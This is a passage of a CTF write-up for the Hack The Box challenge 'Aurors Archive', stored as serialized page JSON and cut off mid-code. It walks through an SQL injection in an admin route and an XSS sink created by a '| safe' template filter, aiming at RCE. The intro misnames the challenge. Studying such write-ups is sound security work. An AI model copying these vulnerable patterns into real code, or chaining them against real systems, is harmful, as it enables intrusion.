[{"data":1,"prerenderedAt":6362},["ShallowReactive",2],{"content-query-p8F6EJtSIv":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":30,"_type":6356,"_id":6357,"_source":6358,"_file":6359,"_stem":6360,"_extension":6361},"/writeups/aurors-archive","writeups",false,"","Aurors Archive",{"title":10,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"Aurors Archive [UNINTENDED]","Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025","web,xss,postgreSQL,RCE","aurors-archive","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102251/writeups/cyber_apocalypse_2025.webp","2025-03-25",[17,19,21,22,24,26,27,28],{"og:description":18},"Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025.",{"og:title":20},"Aurors Archive writeup [UNINTENDED]",{"og:image":14},{"og:type":23},"article",{"og:url":25},"https://owalid.com/writeups/aurors-archive",{"description":18},{"title":20},{"keywords":29},"web,xss,postgreSQL,RCE,hackthebox,htb,ctf",{"type":31,"children":32,"toc":6350},"root",[33,40,47,53,67,72,78,266,272,277,282,286,291,295,300,714,719,725,738,1058,1063,1180,1192,1196,1201,2043,2048,2145,2157,2335,2340,2344,2349,2354,2359,2553,2558,2562,2567,2687,2691,2695,2700,2821,2826,3260,3265,3431,3436,3440,3445,3450,3456,3461,3653,3668,3673,3702,3707,3712,3770,3782,3871,3900,3905,4788,4801,5079,5084,5089,6328,6340,6344],{"type":34,"tag":35,"props":36,"children":37},"element","h1",{"id":13},[38],{"type":39,"value":8},"text",{"type":34,"tag":41,"props":42,"children":44},"h2",{"id":43},"introduction",[45],{"type":39,"value":46},"Introduction",{"type":34,"tag":48,"props":49,"children":50},"p",{},[51],{"type":39,"value":52},"Batchcraft potions is a hard challenge from the Cyber Apocalypse CTF 2025.",{"type":34,"tag":48,"props":54,"children":55},{},[56,58,65],{"type":39,"value":57},"The goal of this challenge is to have a RCE on the server and read the flag with the binary ",{"type":34,"tag":59,"props":60,"children":62},"code",{"className":61},[],[63],{"type":39,"value":64},"/readflag",{"type":39,"value":66},".",{"type":34,"tag":48,"props":68,"children":69},{},[70],{"type":39,"value":71},"We can see below the architecture of the challenge:",{"type":34,"tag":73,"props":74,"children":77},"custom-image",{"imgSrc":75,":width":76},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102366/writeups/aurors-archive/architecture.webp","330",[],{"type":34,"tag":79,"props":80,"children":81},"ul",{},[82,162,197,219,248],{"type":34,"tag":83,"props":84,"children":85},"li",{},[86,92,94],{"type":34,"tag":87,"props":88,"children":89},"strong",{},[90],{"type":39,"value":91},"User Pages",{"type":39,"value":93},":\n",{"type":34,"tag":79,"props":95,"children":96},{},[97,110,123,136,149],{"type":34,"tag":83,"props":98,"children":99},{},[100,102,108],{"type":39,"value":101},"Dashboard (",{"type":34,"tag":59,"props":103,"children":105},{"className":104},[],[106],{"type":39,"value":107},"dashboard.html",{"type":39,"value":109},"): Displays ongoing auctions.",{"type":34,"tag":83,"props":111,"children":112},{},[113,115,121],{"type":39,"value":114},"My Submissions (",{"type":34,"tag":59,"props":116,"children":118},{"className":117},[],[119],{"type":39,"value":120},"my_submissions.html",{"type":39,"value":122},"): Lists resources submitted by the user.",{"type":34,"tag":83,"props":124,"children":125},{},[126,128,134],{"type":39,"value":127},"My Bids (",{"type":34,"tag":59,"props":129,"children":131},{"className":130},[],[132],{"type":39,"value":133},"my_bids.html",{"type":39,"value":135},"): Lists auctions where the user has placed bids.",{"type":34,"tag":83,"props":137,"children":138},{},[139,141,147],{"type":39,"value":140},"Submit Resource (",{"type":34,"tag":59,"props":142,"children":144},{"className":143},[],[145],{"type":39,"value":146},"submit.html",{"type":39,"value":148},"): Allows submission of a new resource.",{"type":34,"tag":83,"props":150,"children":151},{},[152,154,160],{"type":39,"value":153},"Auction Details (",{"type":34,"tag":59,"props":155,"children":157},{"className":156},[],[158],{"type":39,"value":159},"auction_details.html",{"type":39,"value":161},"): Displays details of a specific auction.",{"type":34,"tag":83,"props":163,"children":164},{},[165,178,179],{"type":34,"tag":87,"props":166,"children":167},{},[168,170,176],{"type":39,"value":169},"REST API (",{"type":34,"tag":59,"props":171,"children":173},{"className":172},[],[174],{"type":39,"value":175},"routes/api.js",{"type":39,"value":177},")",{"type":39,"value":93},{"type":34,"tag":79,"props":180,"children":181},{},[182,187,192],{"type":34,"tag":83,"props":183,"children":184},{},[185],{"type":39,"value":186},"Authentication (login, OAuth).",{"type":34,"tag":83,"props":188,"children":189},{},[190],{"type":39,"value":191},"Management of submissions, auctions and bids.",{"type":34,"tag":83,"props":193,"children":194},{},[195],{"type":39,"value":196},"Integration with a Puppeteer bot to visit submitted URLs.",{"type":34,"tag":83,"props":198,"children":199},{},[200,205,206],{"type":34,"tag":87,"props":201,"children":202},{},[203],{"type":39,"value":204},"Database (db.js)",{"type":39,"value":93},{"type":34,"tag":79,"props":207,"children":208},{},[209,214],{"type":34,"tag":83,"props":210,"children":211},{},[212],{"type":39,"value":213},"PostgreSQL is used to store users, submissions, auctions and bids.",{"type":34,"tag":83,"props":215,"children":216},{},[217],{"type":39,"value":218},"Functions allow creating, reading, updating and deleting data.",{"type":34,"tag":83,"props":220,"children":221},{},[222,234,235],{"type":34,"tag":87,"props":223,"children":224},{},[225,227,233],{"type":39,"value":226},"Admin Panel (",{"type":34,"tag":59,"props":228,"children":230},{"className":229},[],[231],{"type":39,"value":232},"admin.html",{"type":39,"value":177},{"type":39,"value":93},{"type":34,"tag":79,"props":236,"children":237},{},[238,243],{"type":34,"tag":83,"props":239,"children":240},{},[241],{"type":39,"value":242},"Accessible only by the \"admin\" user.",{"type":34,"tag":83,"props":244,"children":245},{},[246],{"type":39,"value":247},"Allows viewing database tables.",{"type":34,"tag":83,"props":249,"children":250},{},[251,256,258],{"type":34,"tag":87,"props":252,"children":253},{},[254],{"type":39,"value":255},"Bot Puppeteer",{"type":39,"value":257}," :\n",{"type":34,"tag":79,"props":259,"children":260},{},[261],{"type":34,"tag":83,"props":262,"children":263},{},[264],{"type":39,"value":265},"Logs in as administrator to the site and visits submitted URLs to verify their content.",{"type":34,"tag":41,"props":267,"children":269},{"id":268},"admin-part",[270],{"type":39,"value":271},"Admin part",{"type":34,"tag":48,"props":273,"children":274},{},[275],{"type":39,"value":276},"We will see on this section the admin part of the website. We can change the password of the admin in the source code to better understand the challenge.",{"type":34,"tag":48,"props":278,"children":279},{},[280],{"type":39,"value":281},"We can see that once authenticated as admin, we have access to the admin section, where it is possible to read the database information.",{"type":34,"tag":73,"props":283,"children":285},{"imgSrc":284},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/admin_preview.webp",[],{"type":34,"tag":48,"props":287,"children":288},{},[289],{"type":39,"value":290},"We can quickly see that the password field in the users table is not encrypted:",{"type":34,"tag":73,"props":292,"children":294},{"imgSrc":293},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/users_table.webp",[],{"type":34,"tag":48,"props":296,"children":297},{},[298],{"type":39,"value":299},"Additionally, we can see in the route that retrieves the database information that there is an SQL injection present, we will examine this in the next section:",{"type":34,"tag":301,"props":302,"children":304},"code-card",{"lang":303},"js",[305],{"type":34,"tag":306,"props":307,"children":310},"pre",{"className":308,"code":309,"language":303,"meta":7,"style":7},"language-js shiki shiki-themes vitesse-dark","// New Endpoint: Get all records from a specified table (POST version)\nrouter.post(\"/table\", isAdmin, async (req, res) => {\n  const { tableName } = req.body;\n  try {\n    const query = `SELECT * FROM \"${tableName}\"`;\n\n    [..SNIP...]\n\n    const results = await runReadOnlyQuery(query);\n    res.json({ success: true, results });\n  }\n  [..SNIP...]\n  \n});\n",[311],{"type":34,"tag":59,"props":312,"children":313},{"__ignoreMap":7},[314,326,421,469,483,539,549,568,576,617,669,678,695,705],{"type":34,"tag":315,"props":316,"children":319},"span",{"class":317,"line":318},"line",1,[320],{"type":34,"tag":315,"props":321,"children":323},{"style":322},"--shiki-default:#758575DD",[324],{"type":39,"value":325},"// New Endpoint: Get all records from a specified table (POST version)\n",{"type":34,"tag":315,"props":327,"children":329},{"class":317,"line":328},2,[330,336,341,347,352,358,364,368,373,378,382,388,393,398,402,407,411,416],{"type":34,"tag":315,"props":331,"children":333},{"style":332},"--shiki-default:#BD976A",[334],{"type":39,"value":335},"router",{"type":34,"tag":315,"props":337,"children":339},{"style":338},"--shiki-default:#666666",[340],{"type":39,"value":66},{"type":34,"tag":315,"props":342,"children":344},{"style":343},"--shiki-default:#80A665",[345],{"type":39,"value":346},"post",{"type":34,"tag":315,"props":348,"children":349},{"style":338},[350],{"type":39,"value":351},"(",{"type":34,"tag":315,"props":353,"children":355},{"style":354},"--shiki-default:#C98A7D77",[356],{"type":39,"value":357},"\"",{"type":34,"tag":315,"props":359,"children":361},{"style":360},"--shiki-default:#C98A7D",[362],{"type":39,"value":363},"/table",{"type":34,"tag":315,"props":365,"children":366},{"style":354},[367],{"type":39,"value":357},{"type":34,"tag":315,"props":369,"children":370},{"style":338},[371],{"type":39,"value":372},",",{"type":34,"tag":315,"props":374,"children":375},{"style":332},[376],{"type":39,"value":377}," isAdmin",{"type":34,"tag":315,"props":379,"children":380},{"style":338},[381],{"type":39,"value":372},{"type":34,"tag":315,"props":383,"children":385},{"style":384},"--shiki-default:#CB7676",[386],{"type":39,"value":387}," async",{"type":34,"tag":315,"props":389,"children":390},{"style":338},[391],{"type":39,"value":392}," (",{"type":34,"tag":315,"props":394,"children":395},{"style":332},[396],{"type":39,"value":397},"req",{"type":34,"tag":315,"props":399,"children":400},{"style":338},[401],{"type":39,"value":372},{"type":34,"tag":315,"props":403,"children":404},{"style":332},[405],{"type":39,"value":406}," res",{"type":34,"tag":315,"props":408,"children":409},{"style":338},[410],{"type":39,"value":177},{"type":34,"tag":315,"props":412,"children":413},{"style":338},[414],{"type":39,"value":415}," =>",{"type":34,"tag":315,"props":417,"children":418},{"style":338},[419],{"type":39,"value":420}," {\n",{"type":34,"tag":315,"props":422,"children":424},{"class":317,"line":423},3,[425,430,435,440,445,450,455,459,464],{"type":34,"tag":315,"props":426,"children":427},{"style":384},[428],{"type":39,"value":429},"  const",{"type":34,"tag":315,"props":431,"children":432},{"style":338},[433],{"type":39,"value":434}," {",{"type":34,"tag":315,"props":436,"children":437},{"style":332},[438],{"type":39,"value":439}," tableName",{"type":34,"tag":315,"props":441,"children":442},{"style":338},[443],{"type":39,"value":444}," }",{"type":34,"tag":315,"props":446,"children":447},{"style":338},[448],{"type":39,"value":449}," =",{"type":34,"tag":315,"props":451,"children":452},{"style":332},[453],{"type":39,"value":454}," req",{"type":34,"tag":315,"props":456,"children":457},{"style":338},[458],{"type":39,"value":66},{"type":34,"tag":315,"props":460,"children":461},{"style":332},[462],{"type":39,"value":463},"body",{"type":34,"tag":315,"props":465,"children":466},{"style":338},[467],{"type":39,"value":468},";\n",{"type":34,"tag":315,"props":470,"children":472},{"class":317,"line":471},4,[473,479],{"type":34,"tag":315,"props":474,"children":476},{"style":475},"--shiki-default:#4D9375",[477],{"type":39,"value":478},"  try",{"type":34,"tag":315,"props":480,"children":481},{"style":338},[482],{"type":39,"value":420},{"type":34,"tag":315,"props":484,"children":486},{"class":317,"line":485},5,[487,492,497,501,506,511,516,521,526,530,535],{"type":34,"tag":315,"props":488,"children":489},{"style":384},[490],{"type":39,"value":491},"    const",{"type":34,"tag":315,"props":493,"children":494},{"style":332},[495],{"type":39,"value":496}," query",{"type":34,"tag":315,"props":498,"children":499},{"style":338},[500],{"type":39,"value":449},{"type":34,"tag":315,"props":502,"children":503},{"style":354},[504],{"type":39,"value":505}," `",{"type":34,"tag":315,"props":507,"children":508},{"style":360},[509],{"type":39,"value":510},"SELECT * FROM \"",{"type":34,"tag":315,"props":512,"children":513},{"style":475},[514],{"type":39,"value":515},"${",{"type":34,"tag":315,"props":517,"children":518},{"style":360},[519],{"type":39,"value":520},"tableName",{"type":34,"tag":315,"props":522,"children":523},{"style":475},[524],{"type":39,"value":525},"}",{"type":34,"tag":315,"props":527,"children":528},{"style":360},[529],{"type":39,"value":357},{"type":34,"tag":315,"props":531,"children":532},{"style":354},[533],{"type":39,"value":534},"`",{"type":34,"tag":315,"props":536,"children":537},{"style":338},[538],{"type":39,"value":468},{"type":34,"tag":315,"props":540,"children":542},{"class":317,"line":541},6,[543],{"type":34,"tag":315,"props":544,"children":546},{"emptyLinePlaceholder":545},true,[547],{"type":39,"value":548},"\n",{"type":34,"tag":315,"props":550,"children":552},{"class":317,"line":551},7,[553,558,563],{"type":34,"tag":315,"props":554,"children":555},{"style":338},[556],{"type":39,"value":557},"    [..",{"type":34,"tag":315,"props":559,"children":560},{"style":332},[561],{"type":39,"value":562},"SNIP",{"type":34,"tag":315,"props":564,"children":565},{"style":338},[566],{"type":39,"value":567},"...]\n",{"type":34,"tag":315,"props":569,"children":571},{"class":317,"line":570},8,[572],{"type":34,"tag":315,"props":573,"children":574},{"emptyLinePlaceholder":545},[575],{"type":39,"value":548},{"type":34,"tag":315,"props":577,"children":579},{"class":317,"line":578},9,[580,584,589,593,598,603,607,612],{"type":34,"tag":315,"props":581,"children":582},{"style":384},[583],{"type":39,"value":491},{"type":34,"tag":315,"props":585,"children":586},{"style":332},[587],{"type":39,"value":588}," results",{"type":34,"tag":315,"props":590,"children":591},{"style":338},[592],{"type":39,"value":449},{"type":34,"tag":315,"props":594,"children":595},{"style":475},[596],{"type":39,"value":597}," await",{"type":34,"tag":315,"props":599,"children":600},{"style":343},[601],{"type":39,"value":602}," runReadOnlyQuery",{"type":34,"tag":315,"props":604,"children":605},{"style":338},[606],{"type":39,"value":351},{"type":34,"tag":315,"props":608,"children":609},{"style":332},[610],{"type":39,"value":611},"query",{"type":34,"tag":315,"props":613,"children":614},{"style":338},[615],{"type":39,"value":616},");\n",{"type":34,"tag":315,"props":618,"children":620},{"class":317,"line":619},10,[621,626,630,635,640,646,651,656,660,664],{"type":34,"tag":315,"props":622,"children":623},{"style":332},[624],{"type":39,"value":625},"    res",{"type":34,"tag":315,"props":627,"children":628},{"style":338},[629],{"type":39,"value":66},{"type":34,"tag":315,"props":631,"children":632},{"style":343},[633],{"type":39,"value":634},"json",{"type":34,"tag":315,"props":636,"children":637},{"style":338},[638],{"type":39,"value":639},"({",{"type":34,"tag":315,"props":641,"children":643},{"style":642},"--shiki-default:#B8A965",[644],{"type":39,"value":645}," success",{"type":34,"tag":315,"props":647,"children":648},{"style":338},[649],{"type":39,"value":650},":",{"type":34,"tag":315,"props":652,"children":653},{"style":475},[654],{"type":39,"value":655}," true",{"type":34,"tag":315,"props":657,"children":658},{"style":338},[659],{"type":39,"value":372},{"type":34,"tag":315,"props":661,"children":662},{"style":332},[663],{"type":39,"value":588},{"type":34,"tag":315,"props":665,"children":666},{"style":338},[667],{"type":39,"value":668}," });\n",{"type":34,"tag":315,"props":670,"children":672},{"class":317,"line":671},11,[673],{"type":34,"tag":315,"props":674,"children":675},{"style":338},[676],{"type":39,"value":677},"  }\n",{"type":34,"tag":315,"props":679,"children":681},{"class":317,"line":680},12,[682,687,691],{"type":34,"tag":315,"props":683,"children":684},{"style":338},[685],{"type":39,"value":686},"  [..",{"type":34,"tag":315,"props":688,"children":689},{"style":332},[690],{"type":39,"value":562},{"type":34,"tag":315,"props":692,"children":693},{"style":338},[694],{"type":39,"value":567},{"type":34,"tag":315,"props":696,"children":698},{"class":317,"line":697},13,[699],{"type":34,"tag":315,"props":700,"children":702},{"style":701},"--shiki-default:#DBD7CAEE",[703],{"type":39,"value":704},"  \n",{"type":34,"tag":315,"props":706,"children":708},{"class":317,"line":707},14,[709],{"type":34,"tag":315,"props":710,"children":711},{"style":338},[712],{"type":39,"value":713},"});\n",{"type":34,"tag":48,"props":715,"children":716},{},[717],{"type":39,"value":718},"The idea now would be to use the bot to retrieve the unencrypted admin password in order to then exploit the SQL injection",{"type":34,"tag":41,"props":720,"children":722},{"id":721},"xss-unintended",[723],{"type":39,"value":724},"XSS [UNINTENDED]",{"type":34,"tag":48,"props":726,"children":727},{},[728,730,736],{"type":39,"value":729},"To execute actions on the bot, we need a primitive that would allow us to execute code on the bot's browser, in other words, an XSS. We can see in the route that displays the auctions that the keyword ",{"type":34,"tag":59,"props":731,"children":733},{"className":732},[],[734],{"type":39,"value":735},"unsafe",{"type":39,"value":737}," is used in the data-auction tag.",{"type":34,"tag":301,"props":739,"children":741},{"lang":740},"html",[742],{"type":34,"tag":306,"props":743,"children":746},{"className":744,"code":745,"language":740,"meta":7,"style":7},"language-html shiki shiki-themes vitesse-dark","{% extends \"layout.html\" %}\n\n{% block content %}\n\u003C!-- Pass the auction data as a JSON string via a data attribute -->\n\u003Cdiv id=\"auction-details-panel\" class=\"rpg-panel\" data-auction='{{ auction | dump | safe }}'> \u003C!-- \u003C-- INJECTION -->\n  \u003Cdiv class=\"panel-header\">\n    \u003Ci class=\"fa-solid fa-gavel\">\u003C/i>\n    \u003Ch2 class=\"panel-title\">Auction Details\u003C/h2>\n  \u003C/div>\n  [...SNIP...]\n\u003C/div>\n{% endblock %}\n",[747],{"type":34,"tag":59,"props":748,"children":749},{"__ignoreMap":7},[750,758,765,773,781,872,910,957,1011,1027,1035,1050],{"type":34,"tag":315,"props":751,"children":752},{"class":317,"line":318},[753],{"type":34,"tag":315,"props":754,"children":755},{"style":701},[756],{"type":39,"value":757},"{% extends \"layout.html\" %}\n",{"type":34,"tag":315,"props":759,"children":760},{"class":317,"line":328},[761],{"type":34,"tag":315,"props":762,"children":763},{"emptyLinePlaceholder":545},[764],{"type":39,"value":548},{"type":34,"tag":315,"props":766,"children":767},{"class":317,"line":423},[768],{"type":34,"tag":315,"props":769,"children":770},{"style":701},[771],{"type":39,"value":772},"{% block content %}\n",{"type":34,"tag":315,"props":774,"children":775},{"class":317,"line":471},[776],{"type":34,"tag":315,"props":777,"children":778},{"style":322},[779],{"type":39,"value":780},"\u003C!-- Pass the auction data as a JSON string via a data attribute -->\n",{"type":34,"tag":315,"props":782,"children":783},{"class":317,"line":485},[784,789,794,799,804,808,813,817,822,826,830,835,839,844,848,853,858,862,867],{"type":34,"tag":315,"props":785,"children":786},{"style":338},[787],{"type":39,"value":788},"\u003C",{"type":34,"tag":315,"props":790,"children":791},{"style":475},[792],{"type":39,"value":793},"div",{"type":34,"tag":315,"props":795,"children":796},{"style":332},[797],{"type":39,"value":798}," id",{"type":34,"tag":315,"props":800,"children":801},{"style":338},[802],{"type":39,"value":803},"=",{"type":34,"tag":315,"props":805,"children":806},{"style":354},[807],{"type":39,"value":357},{"type":34,"tag":315,"props":809,"children":810},{"style":360},[811],{"type":39,"value":812},"auction-details-panel",{"type":34,"tag":315,"props":814,"children":815},{"style":354},[816],{"type":39,"value":357},{"type":34,"tag":315,"props":818,"children":819},{"style":332},[820],{"type":39,"value":821}," class",{"type":34,"tag":315,"props":823,"children":824},{"style":338},[825],{"type":39,"value":803},{"type":34,"tag":315,"props":827,"children":828},{"style":354},[829],{"type":39,"value":357},{"type":34,"tag":315,"props":831,"children":832},{"style":360},[833],{"type":39,"value":834},"rpg-panel",{"type":34,"tag":315,"props":836,"children":837},{"style":354},[838],{"type":39,"value":357},{"type":34,"tag":315,"props":840,"children":841},{"style":332},[842],{"type":39,"value":843}," data-auction",{"type":34,"tag":315,"props":845,"children":846},{"style":338},[847],{"type":39,"value":803},{"type":34,"tag":315,"props":849,"children":850},{"style":354},[851],{"type":39,"value":852},"'",{"type":34,"tag":315,"props":854,"children":855},{"style":360},[856],{"type":39,"value":857},"{{ auction | dump | safe }}",{"type":34,"tag":315,"props":859,"children":860},{"style":354},[861],{"type":39,"value":852},{"type":34,"tag":315,"props":863,"children":864},{"style":338},[865],{"type":39,"value":866},">",{"type":34,"tag":315,"props":868,"children":869},{"style":322},[870],{"type":39,"value":871}," \u003C!-- \u003C-- INJECTION -->\n",{"type":34,"tag":315,"props":873,"children":874},{"class":317,"line":541},[875,880,884,888,892,896,901,905],{"type":34,"tag":315,"props":876,"children":877},{"style":338},[878],{"type":39,"value":879},"  \u003C",{"type":34,"tag":315,"props":881,"children":882},{"style":475},[883],{"type":39,"value":793},{"type":34,"tag":315,"props":885,"children":886},{"style":332},[887],{"type":39,"value":821},{"type":34,"tag":315,"props":889,"children":890},{"style":338},[891],{"type":39,"value":803},{"type":34,"tag":315,"props":893,"children":894},{"style":354},[895],{"type":39,"value":357},{"type":34,"tag":315,"props":897,"children":898},{"style":360},[899],{"type":39,"value":900},"panel-header",{"type":34,"tag":315,"props":902,"children":903},{"style":354},[904],{"type":39,"value":357},{"type":34,"tag":315,"props":906,"children":907},{"style":338},[908],{"type":39,"value":909},">\n",{"type":34,"tag":315,"props":911,"children":912},{"class":317,"line":551},[913,918,923,927,931,935,940,944,949,953],{"type":34,"tag":315,"props":914,"children":915},{"style":338},[916],{"type":39,"value":917},"    \u003C",{"type":34,"tag":315,"props":919,"children":920},{"style":475},[921],{"type":39,"value":922},"i",{"type":34,"tag":315,"props":924,"children":925},{"style":332},[926],{"type":39,"value":821},{"type":34,"tag":315,"props":928,"children":929},{"style":338},[930],{"type":39,"value":803},{"type":34,"tag":315,"props":932,"children":933},{"style":354},[934],{"type":39,"value":357},{"type":34,"tag":315,"props":936,"children":937},{"style":360},[938],{"type":39,"value":939},"fa-solid fa-gavel",{"type":34,"tag":315,"props":941,"children":942},{"style":354},[943],{"type":39,"value":357},{"type":34,"tag":315,"props":945,"children":946},{"style":338},[947],{"type":39,"value":948},">\u003C/",{"type":34,"tag":315,"props":950,"children":951},{"style":475},[952],{"type":39,"value":922},{"type":34,"tag":315,"props":954,"children":955},{"style":338},[956],{"type":39,"value":909},{"type":34,"tag":315,"props":958,"children":959},{"class":317,"line":570},[960,964,968,972,976,980,985,989,993,998,1003,1007],{"type":34,"tag":315,"props":961,"children":962},{"style":338},[963],{"type":39,"value":917},{"type":34,"tag":315,"props":965,"children":966},{"style":475},[967],{"type":39,"value":41},{"type":34,"tag":315,"props":969,"children":970},{"style":332},[971],{"type":39,"value":821},{"type":34,"tag":315,"props":973,"children":974},{"style":338},[975],{"type":39,"value":803},{"type":34,"tag":315,"props":977,"children":978},{"style":354},[979],{"type":39,"value":357},{"type":34,"tag":315,"props":981,"children":982},{"style":360},[983],{"type":39,"value":984},"panel-title",{"type":34,"tag":315,"props":986,"children":987},{"style":354},[988],{"type":39,"value":357},{"type":34,"tag":315,"props":990,"children":991},{"style":338},[992],{"type":39,"value":866},{"type":34,"tag":315,"props":994,"children":995},{"style":701},[996],{"type":39,"value":997},"Auction Details",{"type":34,"tag":315,"props":999,"children":1000},{"style":338},[1001],{"type":39,"value":1002},"\u003C/",{"type":34,"tag":315,"props":1004,"children":1005},{"style":475},[1006],{"type":39,"value":41},{"type":34,"tag":315,"props":1008,"children":1009},{"style":338},[1010],{"type":39,"value":909},{"type":34,"tag":315,"props":1012,"children":1013},{"class":317,"line":578},[1014,1019,1023],{"type":34,"tag":315,"props":1015,"children":1016},{"style":338},[1017],{"type":39,"value":1018},"  \u003C/",{"type":34,"tag":315,"props":1020,"children":1021},{"style":475},[1022],{"type":39,"value":793},{"type":34,"tag":315,"props":1024,"children":1025},{"style":338},[1026],{"type":39,"value":909},{"type":34,"tag":315,"props":1028,"children":1029},{"class":317,"line":619},[1030],{"type":34,"tag":315,"props":1031,"children":1032},{"style":701},[1033],{"type":39,"value":1034},"  [...SNIP...]\n",{"type":34,"tag":315,"props":1036,"children":1037},{"class":317,"line":671},[1038,1042,1046],{"type":34,"tag":315,"props":1039,"children":1040},{"style":338},[1041],{"type":39,"value":1002},{"type":34,"tag":315,"props":1043,"children":1044},{"style":475},[1045],{"type":39,"value":793},{"type":34,"tag":315,"props":1047,"children":1048},{"style":338},[1049],{"type":39,"value":909},{"type":34,"tag":315,"props":1051,"children":1052},{"class":317,"line":680},[1053],{"type":34,"tag":315,"props":1054,"children":1055},{"style":701},[1056],{"type":39,"value":1057},"{% endblock %}\n",{"type":34,"tag":48,"props":1059,"children":1060},{},[1061],{"type":39,"value":1062},"We will explain in more detail why the injection is possible:",{"type":34,"tag":79,"props":1064,"children":1065},{},[1066,1088,1123],{"type":34,"tag":83,"props":1067,"children":1068},{},[1069,1078,1080,1086],{"type":34,"tag":87,"props":1070,"children":1071},{},[1072],{"type":34,"tag":59,"props":1073,"children":1075},{"className":1074},[],[1076],{"type":39,"value":1077},"{{ auction }}",{"type":39,"value":1079},": Injects the ",{"type":34,"tag":59,"props":1081,"children":1083},{"className":1082},[],[1084],{"type":39,"value":1085},"auction",{"type":39,"value":1087}," variable into the template.",{"type":34,"tag":83,"props":1089,"children":1090},{},[1091,1100,1102,1107,1109,1114,1116,1122],{"type":34,"tag":87,"props":1092,"children":1093},{},[1094],{"type":34,"tag":59,"props":1095,"children":1097},{"className":1096},[],[1098],{"type":39,"value":1099},"dump",{"type":39,"value":1101},": Unserializes ",{"type":34,"tag":59,"props":1103,"children":1105},{"className":1104},[],[1106],{"type":39,"value":1085},{"type":39,"value":1108}," to ",{"type":34,"tag":87,"props":1110,"children":1111},{},[1112],{"type":39,"value":1113},"JSON",{"type":39,"value":1115},". It's like ",{"type":34,"tag":59,"props":1117,"children":1119},{"className":1118},[],[1120],{"type":39,"value":1121},"JSON.stringify(auction)",{"type":39,"value":66},{"type":34,"tag":83,"props":1124,"children":1125},{},[1126,1135,1137,1142,1144,1149,1151,1156,1158,1164,1166,1172,1174],{"type":34,"tag":87,"props":1127,"children":1128},{},[1129],{"type":34,"tag":59,"props":1130,"children":1132},{"className":1131},[],[1133],{"type":39,"value":1134},"safe",{"type":39,"value":1136},": Indicates that the content is \"safe\" and ",{"type":34,"tag":87,"props":1138,"children":1139},{},[1140],{"type":39,"value":1141},"prevents HTML escaping",{"type":39,"value":1143},". Without ",{"type":34,"tag":59,"props":1145,"children":1147},{"className":1146},[],[1148],{"type":39,"value":1134},{"type":39,"value":1150},", the ",{"type":34,"tag":59,"props":1152,"children":1154},{"className":1153},[],[1155],{"type":39,"value":357},{"type":39,"value":1157}," and ",{"type":34,"tag":59,"props":1159,"children":1161},{"className":1160},[],[1162],{"type":39,"value":1163},"<",{"type":39,"value":1165}," would be transformed to ",{"type":34,"tag":59,"props":1167,"children":1169},{"className":1168},[],[1170],{"type":39,"value":1171},""",{"type":39,"value":1173}," or ",{"type":34,"tag":59,"props":1175,"children":1177},{"className":1176},[],[1178],{"type":39,"value":1179},"&l",{"type":34,"tag":48,"props":1181,"children":1182},{},[1183,1185,1190],{"type":39,"value":1184},"By analyzing the injection, we can easily guess that it's possible to break the HTML by adding a ",{"type":34,"tag":59,"props":1186,"children":1188},{"className":1187},[],[1189],{"type":39,"value":852},{"type":39,"value":1191}," which will make us escape the tag. However, if we try to inject an XSS payload, we get an error returned by the server indicating that our input is too long",{"type":34,"tag":73,"props":1193,"children":1195},{"imgSrc":1194},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103061/writeups/aurors-archive/to_long_error.webp",[],{"type":34,"tag":48,"props":1197,"children":1198},{},[1199],{"type":39,"value":1200},"By analyzing in more detail why this error occurs, we can see that a size check is performed in the backend code.",{"type":34,"tag":301,"props":1202,"children":1203},{"lang":303},[1204],{"type":34,"tag":306,"props":1205,"children":1207},{"className":308,"code":1206,"language":303,"meta":7,"style":7},"router.post('/auctions/:id/bids', isAuthenticated, async (req, res) => {\n  try {\n    const auctionId = req.params.id;\n    const userId = req.session.userId;\n    const { bid } = req.body;\n\n    if (bid.length > 10) { // \u003C-- CHECK THE LENGTH\n      return res.status(400).json({ success: false, message: 'Too long' });\n    }\n    await placeBid(auctionId, userId, bid);\n    return res.json({ success: true });\n  } catch (err) {\n    console.error('Error placing bid:', err);\n    const status = err.message.includes('Invalid') ? 400\n                  : (err.message.includes('not found') || err.message.includes('closed')) ? 404\n                  : 500;\n    return res.status(status).json({ success: false, message: err.message || 'Internal server error.' });\n  }\n});\n",[1208],{"type":34,"tag":59,"props":1209,"children":1210},{"__ignoreMap":7},[1211,1288,1299,1341,1383,1423,1430,1480,1567,1575,1617,1657,1687,1734,1803,1913,1930,2027,2035],{"type":34,"tag":315,"props":1212,"children":1213},{"class":317,"line":318},[1214,1218,1222,1226,1230,1234,1239,1243,1247,1252,1256,1260,1264,1268,1272,1276,1280,1284],{"type":34,"tag":315,"props":1215,"children":1216},{"style":332},[1217],{"type":39,"value":335},{"type":34,"tag":315,"props":1219,"children":1220},{"style":338},[1221],{"type":39,"value":66},{"type":34,"tag":315,"props":1223,"children":1224},{"style":343},[1225],{"type":39,"value":346},{"type":34,"tag":315,"props":1227,"children":1228},{"style":338},[1229],{"type":39,"value":351},{"type":34,"tag":315,"props":1231,"children":1232},{"style":354},[1233],{"type":39,"value":852},{"type":34,"tag":315,"props":1235,"children":1236},{"style":360},[1237],{"type":39,"value":1238},"/auctions/:id/bids",{"type":34,"tag":315,"props":1240,"children":1241},{"style":354},[1242],{"type":39,"value":852},{"type":34,"tag":315,"props":1244,"children":1245},{"style":338},[1246],{"type":39,"value":372},{"type":34,"tag":315,"props":1248,"children":1249},{"style":332},[1250],{"type":39,"value":1251}," 